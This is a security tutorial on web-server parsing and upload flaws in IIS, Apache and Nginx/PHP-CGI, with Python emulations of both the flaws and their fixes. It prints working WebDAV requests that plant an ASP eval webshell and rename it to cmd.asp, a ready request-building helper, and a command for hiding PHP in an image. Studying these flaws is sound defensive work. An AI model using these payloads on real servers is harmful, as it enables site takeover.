[Web Security] Upload Vulnerabilities: Parsing Vulnerabilities

Source: Internet
Author: User
Tags: php, script
I. IIS parsing vulnerabilities
1. If a folder is named with an .asp or .asa extension (for example /test.asp/), IIS 6.0 parses every file inside it as ASP, whatever the file's own extension: /test.asp/1.jpg is executed as a script.
2. A file named *.asp;1.jpg is likewise executed by IIS 6.0 as an ASP script. The server truncates the name at the semicolon, so the trailing .jpg never reaches the script mapping.
Microsoft does not treat these behaviours as vulnerabilities and has not shipped an IIS 6.0 patch for them, so both "vulnerabilities" remain on IIS 6.0 installations.
3. WebDAV (abuse of IIS write permission)

Step 1: send OPTIONS to learn which HTTP methods the server supports.

Request:
OPTIONS / HTTP/1.1
Host: www.example.com

Response:
...
Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
...
PUT, DELETE, COPY, MOVE and MKCOL in this list mean the server admits to accepting writes; whether it really does so for an anonymous client is only confirmed by the next step.

Step 2: upload the script file with PUT. Content-Length must equal the length of the body that follows (28 bytes here).

Request:
PUT /a.txt HTTP/1.1
Host: www.example.com
Content-Length: 28

<%eval request ("Chopper")%>

Step 3: rename the file with COPY (or MOVE) so that it carries a script extension. This step matters when the server accepts PUT for harmless extensions such as .txt but refuses .asp directly; COPY and MOVE are often not filtered the same way.

Request:
COPY /a.txt HTTP/1.1
Host: www.example.com
Destination: http://www.example.com/cmd.asp

Step 4: with DELETE an attacker can likewise remove any file that the writable WebDAV location exposes.

Request:
DELETE /a.txt HTTP/1.1
Host: www.example.com
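The probe-and-upload sequence above, written out as a small Python helper. This is an added example, not code from the original article: it parses an OPTIONS response for the write-capable methods that matter, and builds the PUT/COPY requests with a Content-Length computed from the body instead of typed by hand. The OPTIONS response is constructed to mirror the one quoted above, www.example.com is the article's placeholder host, and nothing is sent over the network.

```python
"""Added example: read an OPTIONS response for WebDAV write methods and build
the raw PUT/COPY requests from the article.  The response below is constructed
to match the one quoted in the article; the host is a placeholder."""

# Methods that let a client modify server content.  MKCOL and PROPPATCH are
# included because a writable DAV share normally exposes them as well.
WRITE_METHODS = {"PUT", "DELETE", "COPY", "MOVE", "MKCOL", "PROPPATCH"}

# Constructed OPTIONS response (IIS 6.0 with WebDAV enabled).
SAMPLE_OPTIONS_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Microsoft-IIS/6.0\r\n"
    "MS-Author-Via: DAV\r\n"
    "DAV: 1, 2\r\n"
    "Public: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, "
    "PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH\r\n"
    "Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, "
    "PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH\r\n"
    "Content-Length: 0\r\n"
    "\r\n"
)


def parse_headers(raw: str) -> dict:
    """Return the response headers as a lower-cased name -> value dict."""
    head = raw.split("\r\n\r\n", 1)[0]
    headers = {}
    for line in head.split("\r\n")[1:]:          # skip the status line
        if ":" in line:
            name, value = line.split(":", 1)
            headers[name.strip().lower()] = value.strip()
    return headers


def advertised_methods(raw: str) -> set:
    """Union of the methods listed in the Public and Allow headers."""
    headers = parse_headers(raw)
    methods = set()
    for name in ("public", "allow"):
        if name in headers:
            methods |= {m.strip().upper() for m in headers[name].split(",") if m.strip()}
    return methods


def risky_methods(raw: str) -> set:
    """Write-capable methods the server admits to supporting."""
    return advertised_methods(raw) & WRITE_METHODS


def build_request(method: str, path: str, host: str, headers=None, body: bytes = b"") -> bytes:
    """Serialise one HTTP/1.1 request; Content-Length is derived from the body."""
    lines = [f"{method} {path} HTTP/1.1", f"Host: {host}"]
    for name, value in (headers or {}).items():
        lines.append(f"{name}: {value}")
    if body:
        lines.append(f"Content-Length: {len(body)}")
    return ("\r\n".join(lines) + "\r\n\r\n").encode() + body


def webdav_upload_sequence(host: str, payload: bytes, tmp="/a.txt", final="/cmd.asp") -> list:
    """The OPTIONS, PUT, COPY sequence from the article as raw request bytes."""
    return [
        build_request("OPTIONS", "/", host),
        build_request("PUT", tmp, host, body=payload),
        build_request("COPY", tmp, host, {"Destination": f"http://{host}{final}"}),
    ]


if __name__ == "__main__":
    print("write methods advertised:", sorted(risky_methods(SAMPLE_OPTIONS_RESPONSE)))
    for req in webdav_upload_sequence("www.example.com", b'<%eval request ("Chopper")%>'):
        print(req.decode())
```

A non-empty result from risky_methods only says the server advertises writes; an actual PUT (step 2) is what proves that anonymous clients are allowed to use them, and on a hardened server the same OPTIONS probe should list only OPTIONS, GET, HEAD and POST.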

II. Apache parsing vulnerability

In Apache 1.x and Apache 2.x, a file named 1.php.rar is executed as a PHP file.
Apache does not look only at the last extension. It examines the extensions in the filename from right to left: an extension it does not recognise (here .rar) is skipped, and it keeps going until it reaches one it knows (.php), which decides how the file is handled. If none of the extensions is recognised, the file is served as plain content, so a script uploaded that way has its source disclosed instead.

This bypasses blacklist-based checks that only look at the final extension: .rar is not on the list, yet .php still gets the file executed.

The extensions Apache recognises as media types are listed in the conf/mime.types file under the installation directory; on the machine used here that is C:\wamp\bin\apache\Apache2.2.21\conf\mime.types. The mapping of .php to the PHP interpreter itself comes from an AddHandler or AddType directive in the Apache configuration. Binding PHP with a <FilesMatch "\.php$"> block and SetHandler instead ties execution to the final extension and closes this gap.
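An emulation of the behaviour just described, added here as an example and not taken from Apache's own code: the per-extension walk that mod_mime performs when PHP is bound with AddHandler, the last-extension-only blacklist that it defeats, and the FilesMatch rule that only fires on a trailing .php. The handler and media-type tables are a constructed subset; the filenames are the article's.

```python
"""Added example: why 1.php.rar reaches the PHP handler under AddHandler, and
why an upload blacklist on the final extension does not notice.  This is an
emulation written for the article, not Apache's code; the tables are constructed."""
import re

# Media types Apache knows from conf/mime.types (constructed subset).
MIME_TYPES = {"jpg": "image/jpeg", "png": "image/png", "gif": "image/gif",
              "html": "text/html", "txt": "text/plain"}

# Weak configuration the article's behaviour depends on:
#   AddHandler application/x-httpd-php .php
ADD_HANDLER = {"php": "application/x-httpd-php"}


def mod_mime_handler(filename: str, handlers=ADD_HANDLER, types=MIME_TYPES):
    """Look at every dotted segment after the basename, not just the last one.
    A segment with an AddHandler mapping selects that handler; a segment that
    is a known media type sets the Content-Type; an unknown segment (such as
    'rar') has no effect and scanning continues.  Returns (handler, content_type)."""
    handler, ctype = None, None
    for ext in filename.split(".")[1:]:
        ext = ext.lower()
        if ext in handlers:
            handler = handlers[ext]
        elif ext in types:
            ctype = types[ext]
    return handler, ctype


# Hardened configuration: bind the handler only to names whose *last*
# extension is .php:
#   <FilesMatch "\.php$">
#       SetHandler application/x-httpd-php
#   </FilesMatch>
FILES_MATCH = re.compile(r"\.php$", re.IGNORECASE)


def files_match_handler(filename: str):
    """Handler chosen under the FilesMatch configuration, or None."""
    return "application/x-httpd-php" if FILES_MATCH.search(filename) else None


def blacklist_rejects(filename: str, banned=("php", "php3", "phtml")) -> bool:
    """The kind of upload filter the article says is bypassed: it only checks
    the trailing extension."""
    return filename.rsplit(".", 1)[-1].lower() in banned


if __name__ == "__main__":
    for name in ("1.php", "1.php.rar", "1.jpg", "shell.php.jpg"):
        print(f"{name:14} blacklisted={blacklist_rejects(name)!s:5} "
              f"AddHandler={mod_mime_handler(name)[0]} FilesMatch={files_match_handler(name)}")
```

Under AddHandler both 1.php.rar and shell.php.jpg reach the PHP handler while the blacklist lets them through; under the FilesMatch binding only names that actually end in .php are executed, which is what an extension blacklist assumed all along.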



III. PHP CGI parsing vulnerability
On some sites running Nginx, requesting http://www.xxser.com/1.jpg/1.php causes 1.jpg to be interpreted as a PHP script, even though 1.php does not exist.
This means an attacker can upload a legitimate-looking "picture" with PHP code appended (a picture trojan), then add "/xxx.php" to its URL and obtain a webshell on the site.

This is not an Nginx-specific flaw; the same parsing behaviour appears in web containers such as IIS 7.0, IIS 7.5 and lighttpd when they hand requests to PHP the same way.

The root cause is in PHP CGI rather than the web server. The php.ini option cgi.fix_pathinfo (on the machine used here, C:\wamp\bin\php\php5.3.10\php.ini) defaults to 1. The server's rule for PHP matches any URL ending in .php and passes the whole path to PHP as SCRIPT_FILENAME; when that file does not exist, PHP walks back through the path component by component until it finds a file that does (here 1.jpg), executes that file and treats the remainder (/1.php) as PATH_INFO. The usual fixes are to set cgi.fix_pathinfo=0, to limit php-fpm with security.limit_extensions = .php, or to add try_files $uri =404 to the Nginx PHP location so that paths that do not exist are never proxied to PHP.


Appendix: making a picture trojan with the Windows copy command: copy 1.jpg /b + 1.php /a 2.php (/b treats the file as binary, /a as ASCII text). The result is a valid image with the PHP code appended after the image data.
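The picture-trojan construction and the cgi.fix_pathinfo fallback from the section above, emulated in Python as an added example (not code from the article or from PHP). It builds the appended-PHP image that the copy command produces, resolves a request for /1.jpg/1.php the way PHP CGI does with fix_pathinfo on and off, and models the two server-side mitigations named above plus a simple upload check. The document root, image header and PHP payload are constructed for the example.

```python
"""Added example for the Nginx / PHP-CGI section: build the picture trojan,
then emulate how cgi.fix_pathinfo=1 turns /1.jpg/1.php into execution of 1.jpg
and how the mitigations stop it.  Files and paths are constructed, not real."""
import posixpath

JPEG_HEADER = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00"   # enough to pass a magic-byte check
PHP_PAYLOAD = b"<?php echo 'webshell'; ?>"


def make_picture_trojan(image: bytes, php: bytes) -> bytes:
    """Equivalent of:  copy 1.jpg /b + 1.php /a 2.php  (image first, script after)."""
    return image + php


# Constructed document root after the trojan has been uploaded as 1.jpg.
DOCROOT = {
    "/1.jpg": make_picture_trojan(JPEG_HEADER, PHP_PAYLOAD),
    "/index.php": b"<?php echo 'home'; ?>",
}


def php_cgi_resolve(script_filename: str, fs: dict, fix_pathinfo: bool):
    """Which file PHP-CGI executes for a given SCRIPT_FILENAME.
    With cgi.fix_pathinfo=1 PHP strips trailing path components until it finds
    an existing file and treats the rest as PATH_INFO.  With 0 a missing file
    is an error ('No input file specified').  Returns (executed_file, path_info)."""
    if script_filename in fs:
        return script_filename, ""
    if not fix_pathinfo:
        return None, ""
    path = script_filename
    while path not in ("/", ""):
        path, _tail = posixpath.split(path)
        if path in fs:
            return path, script_filename[len(path):]
    return None, ""


def nginx_try_files(uri: str, fs: dict) -> bool:
    # location ~ \.php$ { try_files $uri =404; fastcgi_pass ...; }
    # Only proxy to PHP when the requested path itself exists.
    return uri in fs


def fpm_limit_extensions(executed, allowed=(".php",)) -> bool:
    """php-fpm  security.limit_extensions = .php : refuse other extensions even
    if fix_pathinfo handed them over."""
    return executed is not None and executed.lower().endswith(allowed)


def upload_is_suspicious(data: bytes) -> bool:
    """Upload-side check: JPEG magic bytes followed somewhere by a PHP open tag.
    Catches the copy /b + /a construction; re-encoding the image is the
    stronger fix because it drops anything after the image data."""
    return data.startswith(b"\xff\xd8") and b"<?php" in data


if __name__ == "__main__":
    request = "/1.jpg/1.php"
    print("fix_pathinfo=1 ->", php_cgi_resolve(request, DOCROOT, True))
    print("fix_pathinfo=0 ->", php_cgi_resolve(request, DOCROOT, False))
    print("try_files passes:", nginx_try_files(request, DOCROOT))
    executed, _ = php_cgi_resolve(request, DOCROOT, True)
    print("limit_extensions allows:", fpm_limit_extensions(executed))
    print("upload flagged:", upload_is_suspicious(DOCROOT["/1.jpg"]))
```

With fix_pathinfo on, the request resolves to /1.jpg with PATH_INFO /1.php, which is exactly the article's webshell. Each mitigation breaks a different link: try_files stops the request before it reaches PHP, fix_pathinfo=0 makes PHP refuse the missing file, and limit_extensions refuses to run a .jpg even if the other two are absent.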

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.
